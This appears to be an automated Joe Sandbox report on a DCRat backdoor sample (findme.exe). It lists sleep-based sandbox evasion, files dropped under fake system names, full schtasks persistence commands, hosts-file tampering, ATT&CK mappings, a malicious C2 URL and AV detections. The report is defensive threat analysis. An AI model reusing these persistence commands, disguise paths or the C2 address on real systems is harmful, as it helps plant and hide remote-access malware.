          Source: C:\runtimebrokerHost\webnetdhcp.exe TID: 7592 | Thread sleep time: -599281s >= -30000s
          Source: C:\runtimebrokerHost\webnetdhcp.exe TID: 7592 | Thread sleep time: -599171s >= -30000s
          Source: C:\runtimebrokerHost\webnetdhcp.exe TID: 7592 | Thread sleep time: -599057s >= -30000s
          Source: C:\runtimebrokerHost\webnetdhcp.exe TID: 7592 | Thread sleep time: -598948s >= -30000s
          Source: C:\runtimebrokerHost\webnetdhcp.exe TID: 7592 | Thread sleep time: -598844s >= -30000s
          Source: C:\runtimebrokerHost\webnetdhcp.exe TID: 7592 | Thread sleep time: -598734s >= -30000s
          Source: C:\runtimebrokerHost\webnetdhcp.exe TID: 7592 | Thread sleep time: -598625s >= -30000s
          Source: C:\runtimebrokerHost\webnetdhcp.exe TID: 7592 | Thread sleep time: -598516s >= -30000s
          Source: C:\runtimebrokerHost\webnetdhcp.exe TID: 7592 | Thread sleep time: -598406s >= -30000s
          Source: C:\runtimebrokerHost\webnetdhcp.exe TID: 7592 | Thread sleep time: -598294s >= -30000s
          Source: C:\runtimebrokerHost\webnetdhcp.exe TID: 7592 | Thread sleep time: -598184s >= -30000s
          Source: C:\runtimebrokerHost\webnetdhcp.exe TID: 7592 | Thread sleep time: -598071s >= -30000s
          Source: C:\runtimebrokerHost\webnetdhcp.exe TID: 7592 | Thread sleep time: -597959s >= -30000s
          Source: C:\runtimebrokerHost\webnetdhcp.exe TID: 7592 | Thread sleep time: -597844s >= -30000s
          Source: C:\runtimebrokerHost\webnetdhcp.exe TID: 7592 | Thread sleep time: -597712s >= -30000s
          Source: C:\runtimebrokerHost\webnetdhcp.exe TID: 7592 | Thread sleep time: -597608s >= -30000s
          Source: C:\runtimebrokerHost\webnetdhcp.exe TID: 7592 | Thread sleep time: -597496s >= -30000s
          Source: C:\runtimebrokerHost\webnetdhcp.exe TID: 7592 | Thread sleep time: -597390s >= -30000s
          Source: C:\runtimebrokerHost\webnetdhcp.exe TID: 7592 | Thread sleep time: -597280s >= -30000s
          Source: C:\runtimebrokerHost\webnetdhcp.exe TID: 7592 | Thread sleep time: -597164s >= -30000s
          Source: C:\runtimebrokerHost\webnetdhcp.exe TID: 7592 | Thread sleep time: -596995s >= -30000s
          Source: C:\runtimebrokerHost\webnetdhcp.exe TID: 7592 | Thread sleep time: -596866s >= -30000s
          Source: C:\runtimebrokerHost\webnetdhcp.exe TID: 7592 | Thread sleep time: -596609s >= -30000s
          Source: C:\runtimebrokerHost\webnetdhcp.exe TID: 7464 | Thread sleep time: -30000s >= -30000s
          Source: C:\runtimebrokerHost\webnetdhcp.exe TID: 7404 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
          Source: C:\runtimebrokerHost\webnetdhcp.exe | File Volume queried: C:\ FullSizeInformation
          Source: C:\Users\user\Desktop\findme.exe | Code function: 0_2_004CA5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 0_2_004CA5F4
          Source: C:\Users\user\Desktop\findme.exe | Code function: 0_2_004DB8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW, 0_2_004DB8E0
          Source: C:\Users\user\Desktop\findme.exe | Code function: 0_2_004EAAA8 FindFirstFileExA, 0_2_004EAAA8
          Source: C:\Users\user\Desktop\findme.exe | Code function: 0_2_004DDD72 VirtualQuery,GetSystemInfo, 0_2_004DDD72
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Thread delayed: delay time: 60000
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Thread delayed: delay time: 922337203685477
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Thread delayed: delay time: 600000
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Thread delayed: delay time: 599890
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Thread delayed: delay time: 599780
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Thread delayed: delay time: 599653
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Thread delayed: delay time: 599539
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Thread delayed: delay time: 599417
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Thread delayed: delay time: 599281
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Thread delayed: delay time: 599171
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Thread delayed: delay time: 599057
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Thread delayed: delay time: 598948
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Thread delayed: delay time: 598844
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Thread delayed: delay time: 598734
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Thread delayed: delay time: 598625
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Thread delayed: delay time: 598516
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Thread delayed: delay time: 598406
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Thread delayed: delay time: 598294
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Thread delayed: delay time: 598184
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Thread delayed: delay time: 598071
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Thread delayed: delay time: 597959
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Thread delayed: delay time: 597844
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Thread delayed: delay time: 597712
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Thread delayed: delay time: 597608
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Thread delayed: delay time: 597496
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Thread delayed: delay time: 597390
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Thread delayed: delay time: 597280
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Thread delayed: delay time: 597164
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Thread delayed: delay time: 596995
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Thread delayed: delay time: 596866
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Thread delayed: delay time: 596609
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Thread delayed: delay time: 922337203685477
          Source: webnetdhcp.exe, 0000000A.00000002.1478477880.000000001D474000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\
          Source: webnetdhcp.exe, 0000000A.00000000.1278269582.00000000009C2000.00000002.00000001.01000000.0000000A.sdmp, findme.exe, WGNWJePMcpkvwPkbkGq.exe0.10.dr, WGNWJePMcpkvwPkbkGq.exe1.10.dr, WGNWJePMcpkvwPkbkGq.exe.10.dr, WGNWJePMcpkvwPkbkGq.exe4.10.dr, WmiPrvSE.exe.10.dr, SearchApp.exe.10.dr | Binary or memory string: qEmuW
          Source: findme.exe, 00000000.00000003.1253378099.0000000002CC4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\:
          Source: wscript.exe, 00000002.00000003.1277958730.00000000034A3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: webnetdhcp.exe, 0000000A.00000002.1471618002.000000001BD45000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:s
          Source: webnetdhcp.exe, 0000000A.00000002.1478477880.000000001D474000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
          Source: webnetdhcp.exe, 0000000A.00000002.1471618002.000000001BCF9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: C:\Users\user\Desktop\findme.exe | API call chain: ExitProcess graph end node | graph_0-23418
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\findme.exe | Code function: 0_2_004E866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_004E866F
          Source: C:\Users\user\Desktop\findme.exe | Code function: 0_2_004E753D mov eax, dword ptr fs:[00000030h] 0_2_004E753D
          Source: C:\Users\user\Desktop\findme.exe | Code function: 0_2_004EB710 GetProcessHeap, 0_2_004EB710
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Process token adjusted: Debug
          Source: C:\Users\user\Desktop\findme.exe | Code function: 0_2_004DF063 SetUnhandledExceptionFilter, 0_2_004DF063
          Source: C:\Users\user\Desktop\findme.exe | Code function: 0_2_004DF22B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_004DF22B
          Source: C:\Users\user\Desktop\findme.exe | Code function: 0_2_004E866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_004E866F
          Source: C:\Users\user\Desktop\findme.exe | Code function: 0_2_004DEF05 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_004DEF05
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\runtimebrokerHost\webnetdhcp.exe | File written: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Users\user\Desktop\findme.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\runtimebrokerHost\P6MatiaJbshfFUR3.vbe"
          Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\runtimebrokerHost\Gjynmp1cQgbqqAJzLCDkc0fMhQUnd.bat" "
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\runtimebrokerHost\webnetdhcp.exe "C:\runtimebrokerHost\webnetdhcp.exe"
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Process created: unknown unknown (9 identical entries)
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files\Windows Defender\Platform\RuntimeBroker.exe'" /rl HIGHEST /f
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Defender\Platform\RuntimeBroker.exe'" /rl HIGHEST /f
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WGNWJePMcpkvwPkbkGqW" /sc MINUTE /mo 9 /tr "'C:\Users\Default User\Application Data\Microsoft\Internet Explorer\Quick Launch\WGNWJePMcpkvwPkbkGq.exe'" /f
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess created: unknown unknownJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WGNWJePMcpkvwPkbkGqW" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\Application Data\Microsoft\Internet Explorer\Quick Launch\WGNWJePMcpkvwPkbkGq.exe'" /rl HIGHEST /fJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WGNWJePMcpkvwPkbkGq" /sc ONLOGON /tr "'C:\Recovery\WGNWJePMcpkvwPkbkGq.exe'" /rl HIGHEST /fJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\findme.exeCode function: 0_2_004DED5B cpuid 0_2_004DED5B
          Source: C:\Users\user\Desktop\findme.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_004DA63C
          Source: C:\runtimebrokerHost\webnetdhcp.exeQueries volume information: C:\runtimebrokerHost\webnetdhcp.exe VolumeInformationJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\findme.exeCode function: 0_2_004DD5D4 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_004DD5D4
          Source: C:\Users\user\Desktop\findme.exeCode function: 0_2_004CACF5 GetVersionExW,0_2_004CACF5
          Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\runtimebrokerHost\webnetdhcp.exe | File written: C:\Windows\System32\drivers\etc\hosts

          Stealing of Sensitive Information

Source: Yara match | File source: 0000000A.00000002.1356824944.0000000003725000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.1356824944.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.1434338547.000000001300D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: webnetdhcp.exe PID: 7384, type: MEMORYSTR

          Remote Access Functionality

Source: Yara match | File source: 0000000A.00000002.1356824944.0000000003725000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.1356824944.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.1434338547.000000001300D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: webnetdhcp.exe PID: 7384, type: MEMORYSTR

MITRE ATT&CK matrix (columns): Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
          Gather Victim Identity Information11
          Scripting
          Valid Accounts11
          Windows Management Instrumentation
          11
          Scripting
          1
          DLL Side-Loading
          1
          File and Directory Permissions Modification
          OS Credential Dumping1
          System Time Discovery
          Remote Services1
          Archive Collected Data
          1
          Ingress Tool Transfer
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts1
          Native API
          1
          DLL Side-Loading
          11
          Process Injection
          1
          Disable or Modify Tools
          LSASS Memory2
          File and Directory Discovery
          Remote Desktop Protocol1
          Clipboard Data
          1
          Encrypted Channel
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts2
          Command and Scripting Interpreter
          11
          Scheduled Task/Job
          11
          Scheduled Task/Job
          1
          Deobfuscate/Decode Files or Information
          Security Account Manager37
          System Information Discovery
          SMB/Windows Admin SharesData from Network Shared Drive2
          Non-Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal Accounts11
          Scheduled Task/Job
          Login HookLogin Hook2
          Obfuscated Files or Information
          NTDS221
          Security Software Discovery
          Distributed Component Object ModelInput Capture12
          Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Software Packing
          LSA Secrets1
          Process Discovery
          SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          DLL Side-Loading
          Cached Domain Credentials31
          Virtualization/Sandbox Evasion
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items223
          Masquerading
          DCSync1
          Application Window Discovery
          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
          Virtualization/Sandbox Evasion
          Proc Filesystem1
          System Network Configuration Discovery
          Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
          Process Injection
          /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
Behavior Graph ID: 1589982 | Sample: findme.exe | Start date: 13/01/2025 | Architecture: WINDOWS | Score: 100
Top-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Antivirus detection for URL or domain; 12 other signatures. DNS/IP: ip-api.com
findme.exe (started)
  dropped: C:\runtimebrokerHost\webnetdhcp.exe (PE32); C:\runtimebrokerHost\P6MatiaJbshfFUR3.vbe (data)
  -> wscript.exe (started)
       signature: Windows Scripting host queries suspicious COM object (likely to drop second stage)
       -> cmd.exe (started)
            -> webnetdhcp.exe (started); conhost.exe (started)
                 network: ip-api.com 208.95.112.1, ports 49699, 49700, 49702, TUT-ASUS, United States
                 dropped: C:\runtimebrokerHost\lsass.exe (PE32); C:\Windows\Tasks\WGNWJePMcpkvwPkbkGq.exe (PE32); C:\Windows\...\WGNWJePMcpkvwPkbkGq.exe (PE32); 12 other malicious files
                 signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; 5 other signatures
                 -> schtasks.exe (started, 3 instances); 2 other processes

Source | Detection | Scanner | Label
findme.exe | 69% | Virustotal |
findme.exe | 66% | ReversingLabs | ByteCode-MSIL.Trojan.Uztuby
findme.exe | 100% | Avira | VBS/Runner.VPG
findme.exe | 100% | Joe Sandbox ML |
Source | Detection | Scanner | Label
C:\Program Files (x86)\Windows Media Player\Media Renderer\WGNWJePMcpkvwPkbkGq.exe | 100% | Avira | HEUR/AGEN.1323984
C:\Program Files (x86)\Windows Media Player\Media Renderer\WGNWJePMcpkvwPkbkGq.exe | 100% | Avira | HEUR/AGEN.1323984
C:\Program Files (x86)\Windows Media Player\Media Renderer\WGNWJePMcpkvwPkbkGq.exe | 100% | Avira | HEUR/AGEN.1323984
C:\Program Files (x86)\Windows Media Player\Media Renderer\WGNWJePMcpkvwPkbkGq.exe | 100% | Avira | HEUR/AGEN.1323984
C:\Users\jones\AppData\Local\WmiPrvSE.exe | 100% | Avira | HEUR/AGEN.1323984
C:\Program Files\7-Zip\SearchApp.exe | 100% | Avira | HEUR/AGEN.1323984
C:\runtimebrokerHost\webnetdhcp.exe | 100% | Avira | HEUR/AGEN.1323984
C:\Program Files (x86)\Google\RuntimeBroker.exe | 100% | Avira | HEUR/AGEN.1323984
C:\Program Files (x86)\Google\RuntimeBroker.exe | 100% | Avira | HEUR/AGEN.1323984
C:\Program Files (x86)\Windows Media Player\Media Renderer\WGNWJePMcpkvwPkbkGq.exe | 100% | Avira | HEUR/AGEN.1323984
C:\runtimebrokerHost\lsass.exe | 100% | Avira | HEUR/AGEN.1323984
C:\Program Files (x86)\Google\RuntimeBroker.exe | 100% | Avira | HEUR/AGEN.1323984
C:\Program Files (x86)\Windows Media Player\Media Renderer\WGNWJePMcpkvwPkbkGq.exe | 100% | Avira | HEUR/AGEN.1323984
C:\runtimebrokerHost\P6MatiaJbshfFUR3.vbe | 100% | Avira | VBS/Runner.VPG
C:\Program Files (x86)\Windows Media Player\Media Renderer\WGNWJePMcpkvwPkbkGq.exe | 100% | Avira | HEUR/AGEN.1323984
C:\Program Files (x86)\Windows Media Player\Media Renderer\WGNWJePMcpkvwPkbkGq.exe | 100% | Avira | HEUR/AGEN.1323984
C:\Program Files (x86)\Windows Media Player\Media Renderer\WGNWJePMcpkvwPkbkGq.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Windows Media Player\Media Renderer\WGNWJePMcpkvwPkbkGq.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Windows Media Player\Media Renderer\WGNWJePMcpkvwPkbkGq.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Windows Media Player\Media Renderer\WGNWJePMcpkvwPkbkGq.exe | 100% | Joe Sandbox ML |
C:\Users\jones\AppData\Local\WmiPrvSE.exe | 100% | Joe Sandbox ML |
C:\Program Files\7-Zip\SearchApp.exe | 100% | Joe Sandbox ML |
C:\runtimebrokerHost\webnetdhcp.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Google\RuntimeBroker.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Google\RuntimeBroker.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Windows Media Player\Media Renderer\WGNWJePMcpkvwPkbkGq.exe | 100% | Joe Sandbox ML |
C:\runtimebrokerHost\lsass.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Google\RuntimeBroker.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Windows Media Player\Media Renderer\WGNWJePMcpkvwPkbkGq.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Windows Media Player\Media Renderer\WGNWJePMcpkvwPkbkGq.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Windows Media Player\Media Renderer\WGNWJePMcpkvwPkbkGq.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Google\RuntimeBroker.exe | 88% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
C:\Program Files (x86)\Windows Media Player\Media Renderer\WGNWJePMcpkvwPkbkGq.exe | 88% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
C:\Program Files\7-Zip\SearchApp.exe | 88% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
C:\Program Files\Windows Defender\Platform\RuntimeBroker.exe | 88% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
C:\Recovery\RuntimeBroker.exe | 88% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
C:\Recovery\WGNWJePMcpkvwPkbkGq.exe | 88% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\WGNWJePMcpkvwPkbkGq.exe | 88% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
C:\Users\Public\Pictures\WGNWJePMcpkvwPkbkGq.exe | 88% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
C:\Users\jones\AppData\Local\WmiPrvSE.exe | 88% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
C:\Windows\AppReadiness\WGNWJePMcpkvwPkbkGq.exe | 88% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
C:\Windows\Media\Festival\WGNWJePMcpkvwPkbkGq.exe | 88% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
C:\Windows\Provisioning\Packages\WGNWJePMcpkvwPkbkGq.exe | 88% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
C:\Windows\Tasks\WGNWJePMcpkvwPkbkGq.exe | 88% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
C:\runtimebrokerHost\lsass.exe | 88% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
C:\runtimebrokerHost\webnetdhcp.exe | 88% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
          No Antivirus matches
          No Antivirus matches
Source | Detection | Scanner | Label
http://734537cm.nyashtyan.top/@0J3bwBXdzh2chlnb | 100% | Avira URL Cloud | malware
Name | IP | Active | Malicious | Antivirus Detection | Reputation
ip-api.com | 208.95.112.1 | true | false | | high
Name | Malicious | Antivirus Detection | Reputation
http://734537cm.nyashtyan.top/@0J3bwBXdzh2chlnb | true | Avira URL Cloud: malware | unknown
http://ip-api.com/line/?fields=hosting | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | webnetdhcp.exe, 0000000A.00000002.1356824944.0000000003001000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://ip-api.com | webnetdhcp.exe, 0000000A.00000002.1356824944.0000000003303000.00000004.00000800.00020000.00000000.sdmp, webnetdhcp.exe, 0000000A.00000002.1356824944.0000000003001000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | false
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1589982
Start date and time: 2025-01-13 12:49:07 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 27s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 42
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: findme.exe
Detection: MAL
Classification: mal100.troj.adwa.evad.winEXE@30/33@3/1
EGA Information:
• Successful, ratio: 50%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, SgrmBroker.exe, schtasks.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.45, 20.12.23.50
• Excluded domains from analysis (whitelisted): 734537cm.nyashtyan.top, otelrules.azureedge.net, slscr.update.microsoft.com, ipinfo.io, ctldl.windowsupdate.com, time.windows.com, api.telegram.org, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target webnetdhcp.exe, PID 7384 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
06:50:06 | API Interceptor | 34x Sleep call for process: webnetdhcp.exe modified
12:50:08 | Task Scheduler | Run new task: RuntimeBroker path: "C:\Recovery\RuntimeBroker.exe"
12:50:08 | Task Scheduler | Run new task: RuntimeBrokerR path: "C:\Recovery\RuntimeBroker.exe"
12:50:10 | Task Scheduler | Run new task: lsass path: "C:\runtimebrokerHost\lsass.exe"
12:50:10 | Task Scheduler | Run new task: lsassl path: "C:\runtimebrokerHost\lsass.exe"
12:50:10 | Task Scheduler | Run new task: SearchApp path: "C:\Program Files\7-Zip\SearchApp.exe"
12:50:10 | Task Scheduler | Run new task: SearchAppS path: "C:\Program Files\7-Zip\SearchApp.exe"
12:50:10 | Task Scheduler | Run new task: WGNWJePMcpkvwPkbkGq path: "C:\Windows\Tasks\WGNWJePMcpkvwPkbkGq.exe"
12:50:11 | Task Scheduler | Run new task: WGNWJePMcpkvwPkbkGqW path: "C:\Windows\Tasks\WGNWJePMcpkvwPkbkGq.exe"
12:50:11 | Task Scheduler | Run new task: WmiPrvSE path: "C:\Users\jones\AppData\Local\WmiPrvSE.exe"
12:50:11 | Task Scheduler | Run new task: WmiPrvSEW path: "C:\Users\jones\AppData\Local\WmiPrvSE.exe"
Match | Associated Sample Name / URL | Detection | Threat Name | Context
208.95.112.1 | tasAgNgjbJ.exe | malicious | Unknown | ip-api.com/json/?fields=61439
208.95.112.1 | Solara.exe | malicious | Python Stealer, Exela Stealer, Xmrig | ip-api.com/json
208.95.112.1 | resembleC2.exe | malicious | Blank Grabber, Umbral Stealer | ip-api.com/json/?fields=225545
208.95.112.1 | F0DgoRk0p1.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | fpY3HP2cnH.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | 4287eV6mBc.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | aik1mr9TOq.exe | malicious | Predator | ip-api.com/json/
208.95.112.1 | DUWPFaZd3a.exe | malicious | AgentTesla, DarkTortilla | ip-api.com/line/?fields=hosting
208.95.112.1 | tb4B9ni6vl.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
